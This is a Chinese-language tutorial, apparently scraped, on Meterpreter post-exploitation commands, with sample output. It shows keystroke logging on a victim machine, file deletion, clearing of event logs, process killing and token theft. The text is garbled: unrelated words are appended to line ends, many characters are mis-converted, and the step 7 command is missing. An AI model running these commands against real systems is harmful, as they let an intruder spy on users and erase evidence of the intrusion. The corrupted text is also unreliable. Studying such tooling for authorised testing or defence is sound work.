Meterpreter是Metasploit框架中的一個殺手鐗,一般做爲利用漏洞後的攻擊載荷所使用,攻擊載荷在觸發漏洞後可以返回給用戶一個控制通道。當使用Armitage、MSFCLI或MSFCONSOLE獲取到目標系統上的一個Meterpreter鏈接時,用戶必須使用Meterpreter傳遞攻擊載荷。MSFCONSOLE用於管理用戶的會話,而Meterpreter則是攻擊載荷和滲透攻擊交互。本節將介紹Meterpreter的使用。shell
Meterpreter包括的一些常見命令以下所示。session
經過打開MSFCONSOLE實現控制。具體操做步驟以下所示。架構
(1)在MSFCONSOLE上啓動一個活躍的會話。框架
(2)經過利用系統的用戶啓動登陸鍵盤輸入。執行命令以下所示:post
meterpreter > keyscan_start Starting the keystroke sniffer…
從輸出的信息中能夠看到鍵盤輸入嗅探已啓動。日誌
(3)捕獲漏洞系統用戶的鍵盤輸入。執行命令以下所示:code
meterpreter > keyscan_dump Dumping captured keystrokes… <Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
以上輸出的信息表示在漏洞系統中用戶輸入了www.baidu.com,aaaa及回車鍵、退出鍵。blog
(4)中止捕獲漏洞系統用戶的鍵盤輸入。執行命令以下所示:token
meterpreter > keyscan_stop Stopping the keystroke sniffer…
從輸出的信息中能夠看到鍵盤輸入嗅探已中止。進程
(5)刪除漏洞系統上的一個文件。執行命令以下所示:
meterpreter > del exploited.docx
(6)清除漏洞系統上的事件日誌。執行命令以下所示:
meterpreter > clearev [*] Wiping 57 records from Application… [*] Wiping 107 records from System… [*] Wiping 0 records from Security…
(7)查看正在運行的進程列表。執行命令以下所示:
輸出的信息顯示了漏洞系統中正在運行的全部進程,包括進程的ID號、進程名、系統架構、用戶及運行程序的路徑等。
(8)使用kill殺死漏洞系統中指定的進程號。執行命令以下所示:
meterpreter > kill 2040 Killing: 2040
(9)嘗試從漏洞系統竊取一個假冒令牌。執行命令以下所示:
meterpreter > steal_token
注意:使用不一樣的模塊,Meterpreter中的命令是不一樣的。有些模塊中,可能不存在以上命令。